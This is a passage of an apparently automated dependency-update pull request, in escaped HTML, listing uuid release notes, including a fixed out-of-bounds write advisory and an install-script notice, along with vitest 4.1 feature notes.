\u003ccode\u003ecrypto\u003c/code\u003e to be global everywhere (requires node@20+) (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/935\"\u003e#935\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edrop node@18 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/934\"\u003e#934\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edrop node@18 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/934\"\u003e#934\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/dc4ddb87272ed2843faccd130bcc41d492688bd3\"\u003edc4ddb8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eexpect \u003ccode\u003ecrypto\u003c/code\u003e to be global everywhere (requires node@20+) (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/935\"\u003e#935\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/f2c235f93059325fa43e1106e624b5291bb523c4\"\u003ef2c235f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUse GITHUB_TOKEN for release-please and enable npm provenance (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/925\"\u003e#925\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/ffa31383e8e4e1f0b4e22e504561272041b8738c\"\u003effa3138\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.1...v13.0.2\"\u003e13.0.2\u003c/a\u003e (2026-05-04)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ererelease to fix provenance. (\u003ca href=\"https://github.com/uuidjs/uuid/commit/49ccb35f78c0c4ce1409dd2f1d89f83caadba10b\"\u003e49ccb35\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.0...v13.0.1\"\u003e13.0.1\u003c/a\u003e (2026-04-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ebackport fix for GHSA-w5hq-g745-h8pq (\u003ca href=\"https://github.com/uuidjs/uuid/commit/9d27ddf7046ce496ef39569ff84d948eeff9cb2a\"\u003e9d27ddf\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v12.0.0...v13.0.0\"\u003e13.0.0\u003c/a\u003e (2025-09-08)\u003c/h2\u003e\n\u003ch3\u003e⚠ BREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003emake browser exports the default (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/901\"\u003e#901\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003emake browser exports the default (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/901\"\u003e#901\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/bce9d72a3ae5b9a3dcd8eb21ef6d1820288a427a\"\u003ebce9d72\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev12.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v12.0.0...v12.0.1\"\u003e12.0.1\u003c/a\u003e (2026-04-29)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/uuidjs/uuid/blob/main/CHANGELOG.md\"\u003euuid's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.0...v14.0.0\"\u003e14.0.0\u003c/a\u003e (2026-04-19)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq\"\u003eGHSA-w5hq-g745-h8pq\u003c/a\u003e: \u003ccode\u003ev3()\u003c/code\u003e, \u003ccode\u003ev5()\u003c/code\u003e, and \u003ccode\u003ev6()\u003c/code\u003e did not validate that writes would remain within the bounds of a caller-supplied buffer, allowing out-of-bounds writes when an invalid \u003ccode\u003eoffset\u003c/code\u003e was provided. A \u003ccode\u003eRangeError\u003c/code\u003e is now thrown if \u003ccode\u003eoffset \u0026lt; 0\u003c/code\u003e or \u003ccode\u003eoffset + 16 \u0026gt; buf.length\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e⚠ BREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ecrypto\u003c/code\u003e is now expected to be globally defined (requires node@20+) (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/935\"\u003e#935\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edrop node@18 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/934\"\u003e#934\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade minimum supported TypeScript version to 5.4.3, in keeping with the project's policy of supporting TypeScript versions released within the last two years\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v12.0.0...v13.0.0\"\u003e13.0.0\u003c/a\u003e (2025-09-08)\u003c/h2\u003e\n\u003ch3\u003e⚠ BREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003emake browser exports the default (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/901\"\u003e#901\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003emake browser exports the default (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/901\"\u003e#901\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/bce9d72a3ae5b9a3dcd8eb21ef6d1820288a427a\"\u003ebce9d72\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v11.1.0...v12.0.0\"\u003e12.0.0\u003c/a\u003e (2025-09-05)\u003c/h2\u003e\n\u003ch3\u003e⚠ BREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdate to typescript@5.2 (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/887\"\u003e#887\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove CommonJS support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/886\"\u003e#886\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edrop node@16 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/883\"\u003e#883\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd node@24 to ci matrix (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/879\"\u003e#879\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/42b6178aa21a593257f0a72abacd220f0b7b8a92\"\u003e42b6178\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edrop node@16 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/883\"\u003e#883\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/0f38cf10366ab074f9328ae2021eea04d5f2e530\"\u003e0f38cf1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove CommonJS support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/886\"\u003e#886\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/ae786e27265f50bcf7cead196c29f1869297c42f\"\u003eae786e2\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupdate to typescript@5.2 (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/887\"\u003e#887\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/c7ee40598ed78584d81ab78dffded9fe5ff20b01\"\u003ec7ee405\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eimprove v4() performance (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/894\"\u003e#894\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/5fd974c12718c8848035650b69b8948f12ace197\"\u003e5fd974c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erestore node: prefix (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/889\"\u003e#889\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/e1f42a354593093ba0479f0b4047dae82d28c507\"\u003ee1f42a3\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v11.0.5...v11.1.0\"\u003e11.1.0\u003c/a\u003e (2025-02-19)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/7c1ea087a8149b57380fc8bb7f68c3a215cb6e4b\"\u003e\u003ccode\u003e7c1ea08\u003c/code\u003e\u003c/a\u003e chore(main): release 14.0.0 (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/926\"\u003e#926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34\"\u003e\u003ccode\u003e3d2c5b0\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/f2c235f93059325fa43e1106e624b5291bb523c4\"\u003e\u003ccode\u003ef2c235f\u003c/code\u003e\u003c/a\u003e fix!: expect \u003ccode\u003ecrypto\u003c/code\u003e to be global everywhere (requires node@20+) (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/935\"\u003e#935\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/529ef0899f5dd503d2ee90d690585d63d78bc212\"\u003e\u003ccode\u003e529ef08\u003c/code\u003e\u003c/a\u003e chore: upgrade TypeScript and fixup types (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/927\"\u003e#927\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/086fd7976f11433edf9ac80be876b3ad243fe087\"\u003e\u003ccode\u003e086fd79\u003c/code\u003e\u003c/a\u003e chore: update dependencies (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/933\"\u003e#933\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/dc4ddb87272ed2843faccd130bcc41d492688bd3\"\u003e\u003ccode\u003edc4ddb8\u003c/code\u003e\u003c/a\u003e feat!: drop node@18 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/934\"\u003e#934\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/0f1f9c9c9cedbae5a1d363d5406c5dfbabe81404\"\u003e\u003ccode\u003e0f1f9c9\u003c/code\u003e\u003c/a\u003e chore: switch to Biome for parsing and linting (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/932\"\u003e#932\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/e2879e64bf125add903c1eff6e0860542c605013\"\u003e\u003ccode\u003ee2879e6\u003c/code\u003e\u003c/a\u003e chore: use maintained version of npm-run-all (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/930\"\u003e#930\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/ffa31383e8e4e1f0b4e22e504561272041b8738c\"\u003e\u003ccode\u003effa3138\u003c/code\u003e\u003c/a\u003e fix: Use GITHUB_TOKEN for release-please and enable npm provenance (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/925\"\u003e#925\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/0423d49df2dc8efc300c804731d25f4d7e0fccc4\"\u003e\u003ccode\u003e0423d49\u003c/code\u003e\u003c/a\u003e docs: remove obsolete v1 option notes (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/915\"\u003e#915\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/uuidjs/uuid/compare/v10.0.0...v14.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for uuid since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version adds \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `vitest` from 0.34.3 to 4.1.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitest-dev/vitest/releases\"\u003evitest's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.1.0\u003c/h2\u003e\n\u003cp\u003eVitest 4.1 is out!\u003c/p\u003e\n\u003cp\u003eThis release page lists all changes made to the project during the 4.1 beta. To get a review of all the new features, read our \u003ca href=\"https://vitest.dev/blog/vitest-4-1\"\u003eblog post\u003c/a\u003e.\u003c/p\u003e\n\u003ch3\u003e   🚀 Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReturn a disposable from doMock()  -  by \u003ca href=\"https://github.com/kirkwaiblinger\"\u003e\u003ccode\u003e@​kirkwaiblinger\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9332\"\u003evitest-dev/vitest#9332\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/e3e659a96\"\u003e\u003c!-- raw HTML omitted --\u003e(e3e65)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdded chai style assertions  -  by \u003ca href=\"https://github.com/ronnakamoto\"\u003e\u003ccode\u003e@​ronnakamoto\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/8842\"\u003evitest-dev/vitest#8842\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/841df9ac5\"\u003e\u003c!-- raw HTML omitted --\u003e(841df)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate to sinon/fake-timers v15 and add \u003ccode\u003esetTickMode\u003c/code\u003e to timer controls  -  by \u003ca href=\"https://github.com/atscott\"\u003e\u003ccode\u003e@​atscott\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/8726\"\u003evitest-dev/vitest#8726\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/4b480aaed\"\u003e\u003c!-- raw HTML omitted --\u003e(4b480)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eExpose matcher types  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9448\"\u003evitest-dev/vitest#9448\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/3e4b913b1\"\u003e\u003c!-- raw HTML omitted --\u003e(3e4b9)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003etoTestSpecification\u003c/code\u003e to reported tasks  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9464\"\u003evitest-dev/vitest#9464\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/1a4705da9\"\u003e\u003c!-- raw HTML omitted --\u003e(1a470)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eShow a warning if \u003ccode\u003evi.mock\u003c/code\u003e or \u003ccode\u003evi.hoisted\u003c/code\u003e are declared outside of top level of the module  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9387\"\u003evitest-dev/vitest#9387\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/5db54a468\"\u003e\u003c!-- raw HTML omitted --\u003e(5db54)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTrack and display expectedly failed tests (.fails) in UI and CLI  -  by \u003ca href=\"https://github.com/Copilot\"\u003e\u003ccode\u003e@​Copilot\u003c/code\u003e\u003c/a\u003e, \u003cstrong\u003esheremet-va\u003c/strong\u003e and \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9476\"\u003evitest-dev/vitest#9476\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/77d75fd34\"\u003e\u003c!-- raw HTML omitted --\u003e(77d75)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport tags  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9478\"\u003evitest-dev/vitest#9478\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/de7c8a521\"\u003e\u003c!-- raw HTML omitted --\u003e(de7c8)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImplement \u003ccode\u003earoundEach\u003c/code\u003e and \u003ccode\u003earoundAll\u003c/code\u003e hooks  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9450\"\u003evitest-dev/vitest#9450\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/2a8cb9dc2\"\u003e\u003c!-- raw HTML omitted --\u003e(2a8cb)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eStabilize experimental features  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9529\"\u003evitest-dev/vitest#9529\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/b5fd2a16a\"\u003e\u003c!-- raw HTML omitted --\u003e(b5fd2)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAccept \u003ccode\u003enew\u003c/code\u003e or \u003ccode\u003eall\u003c/code\u003e in \u003ccode\u003e--update\u003c/code\u003e flag  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9543\"\u003evitest-dev/vitest#9543\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/a5acf28a5\"\u003e\u003c!-- raw HTML omitted --\u003e(a5acf)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003emeta\u003c/code\u003e in test options  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9535\"\u003evitest-dev/vitest#9535\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/7d622e3d1\"\u003e\u003c!-- raw HTML omitted --\u003e(7d622)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport type inference with a new \u003ccode\u003etest.extend\u003c/code\u003e syntax  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9550\"\u003evitest-dev/vitest#9550\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/e53854fcc\"\u003e\u003c!-- raw HTML omitted --\u003e(e5385)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport vite 8 beta, fix type issues in the config with different vite versions  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9587\"\u003evitest-dev/vitest#9587\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/990281dfd\"\u003e\u003c!-- raw HTML omitted --\u003e(99028)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd assertion helper to hide internal stack traces  -  by \u003ca href=\"https://github.com/hi-ogawa\"\u003e\u003ccode\u003e@​hi-ogawa\u003c/code\u003e\u003c/a\u003e and \u003cstrong\u003eClaude Opus 4.6\u003c/strong\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9594\"\u003evitest-dev/vitest#9594\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/eeb0ae2f8\"\u003e\u003c!-- raw HTML omitted --\u003e(eeb0a)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eStore failure screenshots using artifacts API  -  by \u003ca href=\"https://github.com/macarie\"\u003e\u003ccode\u003e@​macarie\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9588\"\u003evitest-dev/vitest#9588\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/24603e3c4\"\u003e\u003c!-- raw HTML omitted --\u003e(24603)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAllow \u003ccode\u003evitest list\u003c/code\u003e to statically collect tests instead of running files to collect them  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9630\"\u003evitest-dev/vitest#9630\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/7a8e7fc20\"\u003e\u003c!-- raw HTML omitted --\u003e(7a8e7)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003e--detect-async-leaks\u003c/code\u003e  -  by \u003ca href=\"https://github.com/AriPerkkio\"\u003e\u003ccode\u003e@​AriPerkkio\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9528\"\u003evitest-dev/vitest#9528\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/c594d4af3\"\u003e\u003c!-- raw HTML omitted --\u003e(c594d)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImplement \u003ccode\u003emockThrow\u003c/code\u003e and \u003ccode\u003emockThrowOnce\u003c/code\u003e  -  by \u003ca href=\"https://github.com/thor-juhasz\"\u003e\u003ccode\u003e@​thor-juhasz\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9512\"\u003evitest-dev/vitest#9512\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/619179fb7\"\u003e\u003c!-- raw HTML omitted --\u003e(61917)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eupdate: \u0026quot;none\u0026quot;\u003c/code\u003e and add docs about snapshots behavior on CI  -  by \u003ca href=\"https://github.com/hi-ogawa\"\u003e\u003ccode\u003e@​hi-ogawa\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9700\"\u003evitest-dev/vitest#9700\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/05f1854e2\"\u003e\u003c!-- raw HTML omitted --\u003e(05f18)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport playwright \u003ccode\u003elaunchOptions\u003c/code\u003e with \u003ccode\u003econnectOptions\u003c/code\u003e  -  by \u003ca href=\"https://github.com/hi-ogawa\"\u003e\u003ccode\u003e@​hi-ogawa\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9702\"\u003evitest-dev/vitest#9702\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/f0ff1b2a0\"\u003e\u003c!-- raw HTML omitted --\u003e(f0ff1)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003epage/locator.mark\u003c/code\u003e API to enhance playwright trace  -  by \u003ca href=\"https://github.com/hi-ogawa\"\u003e\u003ccode\u003e@​hi-ogawa\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9652\"\u003evitest-dev/vitest#9652\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/d0ee546fe\"\u003e\u003c!-- raw HTML omitted --\u003e(d0ee5)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eapi\u003c/strong\u003e:\n\u003cul\u003e\n\u003cli\u003eSupport tests starting or ending with \u003ccode\u003etest\u003c/code\u003e in \u003ccode\u003eexperimental_parseSpecification\u003c/code\u003e  -  by \u003ca href=\"https://github.com/jgillick\"\u003e\u003ccode\u003e@​jgillick\u003c/code\u003e\u003c/a\u003e and \u003cstrong\u003eJeremy Gillick\u003c/strong\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9235\"\u003evitest-dev/vitest#9235\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/2f367fad3\"\u003e\u003c!-- raw HTML omitted --\u003e(2f367)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd filters to \u003ccode\u003ecreateSpecification\u003c/code\u003e  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9336\"\u003evitest-dev/vitest#9336\u003c/a\u003e \u003ca 